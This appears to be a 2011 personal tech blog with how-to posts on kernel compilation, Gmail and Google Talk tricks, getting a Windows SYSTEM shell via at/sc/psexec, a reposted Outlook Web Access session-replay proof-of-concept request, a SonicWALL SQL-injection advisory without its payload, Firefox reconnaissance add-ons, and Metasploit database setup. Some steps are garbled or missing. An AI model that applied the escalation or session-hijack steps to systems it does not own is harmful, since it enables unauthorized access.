Wednesday, December 21, 2011

Run CMD.exe as Local System Account

Strike 1:

I found information online which suggests lauching the CMD.exe using the DOS Task Scheduler AT command. Here’s a sample command:

AT 12:00 /interactive cmd.exe

I gave it a shot but I received a Vista warning that “due to security enhancements, this task will run at the time excepted but not interactively.”

It turns out that this approach will work for XP, 2000 and Server 2003 but due to session 0 isolation Interactive services no longer work on Windows Vista and Windows Server 2008.

Strike 2:

Another solution suggested creating a secondary Windows Service via the Service Control (sc.exe) which merely launches CMD.exe.

C:\sc create RunCMDAsLSA binpath= "cmd" type=own type=interactC:\sc start RunCMDAsLSA

In this case the service fails to start and results it the following error message:

FAILED 1053: The service did not respond to the start or control request in a timely fashion.

Strike 3:

The third suggestion was to launch CMD.exe via a Scheduled Task. Though you may run scheduled tasks under various accounts, I don’t believe the Local System Account is one of them. I’ve tried using the Runas as well, but think I’m running into the same restriction as found when running a scheduled task.
Not Out Yet:

Fortunately, I came across this article which demonstrates the use of PSTools from SysInternals which was acquired by Microsoft in July, 2006. I launched the command line and issued the following statement and suddenly I was running under the Local System Account like magic:

psexec -i -s cmd.exe

PSTools worked great. It’s a lightweight, well-documented set of tools which provided an appropriate solution to my problem.

How to gain access to system account the most powerful account in Windows.

Don’t follow the procedure below if you don’t know what you
are doing. You may harm your PC. If you follow, Do it on your own risk.

1)Check the name of the account you’ve logged into (Click start. You
will see the name of the account you’ve logged in.)

2)Launch the command prompt. (Start | Run | cmd | [Enter] )
in command prompt, create a schedule to run cmd.exe.
To create a schedule type the following line and hit enter.
at 10:41 /interactive “cmd.exe”
this will create a schedule to run cmd.exe at 10:41.
(Since you are testing, check the time in your system try and add two or three minutes.)Change this time according to your local time
Hint: you can check if the schedule is placed by typing “at“
and hitting enter after the above step.

3)Wait for the time you set for the schedule.
cmd.exe would be launched at the specified time.

4)After cmd.exe is launched by the scheduled time, press [CTRL] + [ALT] + [DEL] and launch task manager.
Select “Process” tab, select explorer.exe in the process list and click “End Process” button.
You will receive a confirmation dialogue. Click “Yes” to end the process.

5)Close task manager by clicking the close (X) button.
Close the first cmd window (be careful to close the first one not the second one.)
Now you have only the second command prompt window and an empty desktop.
In command prompt type the following line and hit “Enter”
cd ..

6)In command prompt type the following line and hit “Enter”
If this is the first time you do it, windows creates the necessary
components for you to access System ( Desktop, start menu,
My document)
when it’s finished you will have a new desktop.

7)Close command prompt window. Click start and check your username. It’s changed to System. Now you are a super-power user. Be careful not to harm your PC and delete or modify system files if you don’t know what you are doing.

Am once again saying, don’t attempt accessing system account, unless you are an experienced Windows user

Tuesday, November 22, 2011

Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability

Detail of POC can be viewed

Microsoft Outlook Web Access is prone to a security-bypass vulnerability.

Successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account.

Microsoft Outlook Web Access is vulnerable; other versions may also be affected.

An attacker can carry out this attack using readily available network utilities.

The following proof of concept is available:

GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/,
application/, application/msword, application/x-mfe-ipt,
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;

SonicWALL Aventail 'CategoryID' Parameter SQL Injection Vulnerability

Detail of POC can be viewed

SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Attackers can use a browser to exploit this issue.

The following example URI is available:[SQL]

Sunday, September 11, 2011

Turning Firefox to an Ethical Hacking Platform

Information gathering

Whois and geo-location
ShowIP : Show the IP address of the current page in the status bar. It also allows querying custom services by IP (right mouse button) and Hostname (left mouse button), like whois, netcraft.

Shazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping) enables the user with one-click to map and geo-locate any website they are currently viewing. Geolocation : Displays Geolocation information for a website using data. Works with all versions of Firefox.

Active Whois : Starting Active Whois to get details about any Web site owner and its host server.
Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It includes ( WhoIs, DNS Report, Geolocation , Traceroute , Ping ). Very useful for information gathering phase

Enumeration / fingerprinting
Header Spy: Shows HTTP headers on statusbar
Header Monitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

Social engineering
People Search and Public Record: This Firefox extension is a handy menu tool for investigators, reporters, legal professionals, real estate agents, online researchers and anyone interested in doing their own basic people searches and public record lookups as well as background research.

Googling and spidering
Advanced dork : Gives quick access to Google’s Advanced Operators directly from the context menu. This could be used to scan for hidden files or narrow in a target anonymously (via the option) [Updated Definition. Thanks to CP author of Advanced Dork]

SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from

View Dependencies : View Dependencies adds a tab to the "page info" window, in which it lists all the files which were loaded to show the current page. (useful for a spidering technique)

Sunday, May 22, 2011

Running Multiple Instances of Google Talk

Open Multiple Gtalk Instances
First find out where your GTalk is installed. This would usually be:

C:\Program Files\Google\Google Talk\googletalk.exe

Once you have found out where your Google Talk is,
• create a short cut by right clicking on your desktop and choosing Shortcut
• Browse and choose the location of the file and add “/nomutex” in the end of the location. So your path looks like this
“C:\Program%20Files\Google\Google%20Talk\googletalk.exe” /nomutex

That’s it. Now click on your usual link to open GTalk. After you open it, log into it. Now click on the new shortcut that you created to open the second Google Talk.

Backtrack db_driver mysql problem Error

Backtrack db_driver mysql problem Error

1)# apt-get install libmysqlclient-dev

2) # start mysql or #/etc/init.d/mysql start

3)# mysql -u root -p'toor' by default password is toor

4)mysql> create database metasploit3; // mysql> create database ;

6)mysql> grant all privileges on metasploit3.* to root@localhost;
mysql> exit

7)# update-alternatives --config ruby //

after choose type selection number: 0

8)# ruby -v //check ruby version it should be ruby 1.8.7

9)#gem install mysql

10)# ruby1.8 /pentest/exploits/framework3/msfconsole // it should be starting with ruby1.8 every u open msfconsole

11)msf > db_driver mysql

12)msf > db_connect root:toor@

13)msf > db_status

14)msf > db_nmap -sS -n // check it working or not


Wednesday, April 27, 2011

Insert Images into Your Gmail Messages

Well, it's around 3am . one of my frd asked how to insert image in gmail  

Solution: To put images into your messages or attach images  want to inline them. Just turn on "Inserting images" from the Labs tab under Settings

Make sure you're in rich formatting mode, or it won't show up. Click the little image icon, and you can insert images in two ways: by uploading image files from your computer or providing image URLs.

Gmail doesn't show URL-based images in messages by default to protect you from spammers, so if you're sending mail to other Gmail users, they'll still have to click "Display images below" or "Always display images from ..." to see images you embed.

Tuesday, February 15, 2011

Compile Linux kernel 2.6

Step # 1 Get Latest Linux kernel code

Visit and download the latest source code. File name would be linux-x.y.z.tar.bz2, where x.y.z is actual version number.

root@asheesh#cd /tmp

Step # 2 Extract tar (.tar.bz2) file

root@asheesh# tar -xjvf linux-2.6.25.tar.bz2 -C /usr/src
root@asheesh# cd /usr/src

Step # 3 Configure kernel
root@asheesh# apt-get install gcc (if gcc is not installed)
root@asheesh#make menuconfig

Step # 4 Compile kernel

Start compiling to create a compressed kernel image
root@asheesh# make

Start compiling to kernel modules:
root@asheesh# make modules
root@asheesh#make modules_install

Step # 5 Install kernel

Compiled kernel and installed kernel modules.
root@asheesh#make install

Step # 6: Create an initrd image

Type the following command at a shell prompt:
root@asheesh# cd /boot
root@asheesh# mkinitrd -o initrd.img-2.6.37 2.6.37

Step # 7 Modify Grub configuration file

- /boot/grub/menu.lst (before Edit Please take backup)

Open file using vi or gedit:
root@asheesh# vi /boot/grub/menu.lst

title Debian GNU/Linux, kernel 2.6.25 Default
root (hd0,0)
kernel /boot/vmlinuz root=/dev/hdb1 ro
initrd /boot/initrd.img-2.6.25

Remember to setup correct root=/dev/hdXX device. Save and close the file. If you think editing and writing all lines by hand 
is too much for you, try out update-grub command to update the lines for each kernel in /boot/grub/menu.lst file. Just type 

the command:

Step # 8 : Reboot computer and boot into your new kernel

root@asheesh# reboot